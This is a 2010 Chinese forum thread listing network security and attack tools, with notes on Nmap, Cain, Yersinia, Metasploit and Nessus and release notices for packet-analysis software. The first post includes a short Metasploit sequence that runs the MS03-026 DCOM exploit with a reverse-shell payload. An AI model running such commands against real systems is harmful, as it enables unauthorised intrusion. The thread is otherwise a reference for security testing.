博威---云架构决胜云计算

 找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 7441|回复: 11

精典防火墙及安全测试工具

[复制链接]
发表于 2010-1-19 01:04:05 | 显示全部楼层 |阅读模式
经典扫描工具:
NMAP:(windows平台)
NMAP -v -A 1.1.1.1  判断对方操作系统和端口
dsniff (linux)
抓密码,arp spoofing,dns spoofing,webspy ,功能强大


经典2层工具软件:yersinia (linux平台)
可以做mac flooding , dhcp starvation , stp, 802.1x , dtp , hsrp,cdp,vlan hooping攻击。

Cain (windows)



可以网络嗅探,网络欺骗,破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议,甚至还可以监听内网中他人使用VOIP拨打电话。


密码的破解


Cain还具有强大的破解功能,可以破解md5,md4,pwl,mssql等加密的密文




7层攻击软件
Metasploit 3 (windows平台)

内置了很多漏洞可以在线升级。
例子:

show exploit  -查看可以攻击的漏洞
use msrpc_dcom_ms03_026 调用WIN里面的某个服务
show option  ---查看需要攻击的选项
show PAYLOAD ----攻击调用的shell
set PAYLOAD win32_reverse  调用shell
set RHOST 192.168.1.102
set LHOST  192.168.1.100
exploit ---进行攻击
show target --选择操作系统
set target 0
 楼主| 发表于 2010-1-19 01:07:10 | 显示全部楼层
•交换机攻击:Yersinia
•路由器攻击:Quagga(zebra/ripd/ospfd/bgpd)
•DDos攻击:AttackManager
•ARP攻击:Ettercap、Arpmim
•TCP攻击:Tcphijack
•扫描工具:Nmap、Nikto
•其它:dsniff、nemesis、httptunnel、udptunnel、hping2、sendip、arpwatch
 楼主| 发表于 2010-1-19 01:21:53 | 显示全部楼层
NESSUS  文档.
相当不错。建议高标准掌握

游客,如果您要查看本帖隐藏内容请回复




 Nessus 被认为是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用 Nessus 作为扫描该机构电脑系统的软件。


  1998年, Nessus 的创办人 Renaud Deraison 展开了一项名为 "Nessus"的计划,其计划目的是希望能为因特网社群提供一个免费、威力强大、更新频繁并简易使用的远端系统安全扫瞄程序。经过了数年的发展, 包括 CERT 与 SANS 等著名的网络安全相关机构皆认同此工具软件的功能与可用性。


  2002年时, Renaud 与 Ron Gula, Jack Huffard 创办了一个名为 Tenable Network Security 的机构。在第三版的Nessus 发布之时, 该机构收回了 Nessus 的版权与程序源代码 (原本为开放源代码), 并注册了 nessus.org 成为该机构的网站。 目前此机构位于美国马里兰州的哥伦比亚。
[编辑本段]
Nessus的特色
  * 提供完整的电脑漏洞扫描服务, 并随时更新其漏洞数据库。


  * 不同于传统的漏洞扫描软件, Nessus 可同时在本机或远端上摇控, 进行系统的漏洞分析扫描。


  * 其运作效能能随着系统的资源而自行调整。如果将主机加入更多的资源(例如加快CPU速度或增加内存大小),其效率表现可因为丰富资源而提高。


  * 可自行定义插件(Plug-in)


  * NASL(Nessus Attack Scripting Language) 是由 Tenable 所开发出的语言,用来写入Nessus的安全测试选项。


  * 完整支持SSL (Secure Socket Layer)。


  * 自从1998年开发至今已谕十年, 故为一架构成熟的软件。
[编辑本段]
Nessus 2 安装方法
  在类UNIX的操作系统上(包含Linux), Nessus 并没有像 Windows Installation Shield 之类的软件一样, 提供一个图形化的安装接口。以下是简易的 Nessus 2 安装方法:


  1. 首先必须从 http://www.nessus.org/download/ 下载以下四个档案


  * nessus-libraries-x.x.tar.gz


  * libnasl-x.x.tar.gz


  * nessus-core.x.x.tar.gz


  * nessus-plugins.x.x.tar.gz


  请注意, 以下所要进行的编译(Compilation), 需要依照以上软件的次序。


  2. 在Terminal环境下输入以下指令:


  cd nessus-libraries


  ./configure


  make


  make install


  Installing libnasl


  cd libnasl


  ./configure


  make


  依次序将四个软件包编译完成。


  若您使用的操作系统是Linux, 请确认文件夹 /usr/local/lib 中有存在 /etc/ld.so.conf 文件。 并输入


  ldconfig.


  SUN Solaris 系统的使用者请输入以下指令 :


  export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib


  安装即可完成。
[编辑本段]
Nessus简易使用说明
  1. 执行Nessus。


  2. 在Plugins的选单画面中, 选取您希望分析的漏洞的服务类型, 例如拒绝服务式攻击(DoS)。


  3. 在Scan Options的菜单中,


  * Port Range: 输入您希望扫描的端口(Port)范围


  * Optimize the test: 优化您的扫描程序。建议选取。


  其他选项建议保持默认。


  4. 在 Target Selection 选单当中, 输入您希望扫描的主机IP地址


  5. 按 "Start Scan" 开始扫描。
[编辑本段]
官方网站
  http://www.nessus.org/




扩展阅读: 1.http://www.nessus.org/ 2.http://www.edgeos.com/nessuskb/ 3.http://www.nessus.org/documentation/nessus_3.0_installation_guide.pdf 4.http://www.nessus.org/plugins/index.php?view=faq 5.http://www.nessus.org/documentation/nessus_3.0_client_guide.pdf
 楼主| 发表于 2010-1-19 01:23:41 | 显示全部楼层
NAMP文档

游客,如果您要查看本帖隐藏内容请回复


有这么一个工具,几乎每一个做网络安全的人都肯定会用到。它就是Nmap 。Nmap软件开发者为这一版本做出了辛苦的劳动,其中包括一些非常酷的东西,如Nmap的脚本引擎(NSE),我们甚至用它来检测机器是否感染了Conficker蠕虫。
还有很多其他整洁的新功能和改进,大家可以前往http://nmap.org/5/下载新版Nmap 。
一位在360工作的安全工程师茄子表示:这个已经算是个迷你版的Nessus了,并可以支持LUA这类复杂的脚本。

Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,当然用它扫描单个 主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些 主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息), 它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap通常用于安全审核, 许多系统管理员和网络管理员也用它来做一些日常的工作,比如查看整个网络的信息, 管理服务升级计划,以及监视主机和服务的运行。
Nmap输出的是扫描目标的列表,以及每个目标的补充信息,至于是哪些信息则依赖于所使用的选项。 “所感兴趣的端口表格”是其中的关键。那张表列出端口号,协议,服务名称和状态。状态可能是 open(开放的),filtered(被过滤的), closed(关闭的),或者unfiltered(未被过滤的)。 Open(开放的)意味着目标机器上的应用程序正在该端口监听连接/报文。 filtered(被过滤的) 意味着防火墙,过滤器或者其它网络障碍阻止了该端口被访问,Nmap无法得知 它是 open(开放的) 还是 closed(关闭的)。 closed(关闭的) 端口没有应用程序在它上面监听,但是他们随时可能开放。 当端口对Nmap的探测做出响应,但是Nmap无法确定它们是关闭还是开放时,这些端口就被认为是 unfiltered(未被过滤的) 如果Nmap报告状态组合 open|filteredclosed|filtered时,那说明Nmap无法确定该端口处于两个状态中的哪一个状态。 当要求进行版本探测时,端口表也可以包含软件的版本信息。当要求进行IP协议扫描时 (-sO),Nmap提供关于所支持的IP协议而不是正在监听的端口的信息。

http://nmap.org/man/zh/


 楼主| 发表于 2010-1-19 01:24:20 | 显示全部楼层
metasploit Hacker framework 这个经典测试安全性工具,要知道思科的IPS产品的特征库都是跟着这个META公司的库同步的
 楼主| 发表于 2010-1-19 01:52:15 | 显示全部楼层
IPS测试工具——Traffic IQ Pro
 楼主| 发表于 2010-1-19 01:54:33 | 显示全部楼层
SnifferMate 1.3 发布
拖了很长时间,终于正式发布

增加的功能
Trace File合并、切分
转换更多格式

已经有的功能
Trace File转换
输出Excel 2007报表
Windows 7/Vista中的Trace文件预览
....
一项项以后逐个说

下载请至
http://www.netexpert.cn/dali/?p=25

下载以后,需要到
http://www.netis.com.cn/sniffermate/smapply/
免费申请个序列号

过去安装过BoneLight的用户需要先手工删除BoneLight
 楼主| 发表于 2010-1-19 01:55:27 | 显示全部楼层
Dali 0.6.1发布
在此发布Dali,一个新的分析工具

具体介绍在 http://www.netexpert.cn/dali



SnifferMate 1.3 发布

发布者:admin 于 2009-12月-31 | 4个评论 »


以前的BoneLight如今升级叫做 SnifferMate
下载 SnifferMate 1.3.1 - 分析伴侣
下载以后别忘记去 http://www.netis.com.cn/sniffermate/smapply/ 花三秒钟免费申请个序列号

归档于未分类



Dali 0.6.1 发布

发布者:admin 于 2009-12月-22 | 无评论 »


Dali是一个新工具,调整了协议分析的视角,针对关键的应用进行分析和解析。Dali大幅度改变了协议分析中对流的理解,着重加强了对于网络流视角的支持。今天发布的是0.6.1版本,也是首个向大众公开的早期测试版本。

Dali能够
  • 对TCP流传输效率进行深入解析
  • 对协议、应用进行快速树状统计
  • 对关键性能指标进行历史观测
  • 面向应用的原生解码库
  • 调用第三方解码库和过滤器

Dali还能够对http/email等协议进行应用层展现,帮助我们进行关键应用的分析。
目前的dali仍然处在非常早期的版本,所以参与下载使用的同仁需要有志愿者的觉悟
我们会不断努力改善dali的设计和完善程度,希望提供一个很有用的工具,enjoy it.

下载:Dali Flow Analyzer 0.6.1 - 面向关键应用的协议流分析
同时为了给Dali提供更强有力的解码库,可以下载http://www.netexpert.cn/wireshark/的wireshark UTF-8的中文核心版本。WireShark安装完毕后,Dali会自动调用Wireshark的解码库资源。源代码也可以在该页面上下载。
 楼主| 发表于 2010-1-19 01:57:07 | 显示全部楼层
发布《网络分析专家论坛精华选集2 (2008版)》发布《网络分析专家论坛精华选集2 (2008)》
感谢大家三年多来的支持,之前整理过《网络分析专家论坛精华选集一》,这次进一步整理更多有意义的精华文章。

受限于精力和制作水平,目前的选集仍然只是论坛里优秀原创文章的极小的一部分。
希望以后能够不断发布更多选集。

借这个机会再次向所有台前幕后的英雄表示感谢
下载链接


screenshotn2.JPG
 楼主| 发表于 2010-1-21 08:13:42 | 显示全部楼层
IP与MAC扫描工具

IP-MAC对应扫描.rar (177.87 KB, 下载次数: 2)

Anti ARP Sniffer一款小巧的防ARP攻击工具.
1、Anti ARP Sniffer 可100%防御所有利用ARP 技术的恶意程序,发现疑常并能自动重写ARP数据。  
2、Anti ARP Sniffer 具备追踪ARP攻击者的功能,能够追踪对方的IP地址。  
3、Anti ARP Sniffer可自动修复ARP数据,并保持网络永不中断。  
4、Anti ARP Sniffer能自动获取本机发送与接受的广播包数量。

AntiARPSniffer3.part1.rar (781.25 KB, 下载次数: 0) AntiARPSniffer3.part2.rar (781.25 KB, 下载次数: 0) AntiARPSniffer3.part3.rar (515.06 KB, 下载次数: 0)
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|boway Inc. ( 冀ICP备10011147号 )

GMT+8, 2024-11-24 12:04 , Processed in 0.111118 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表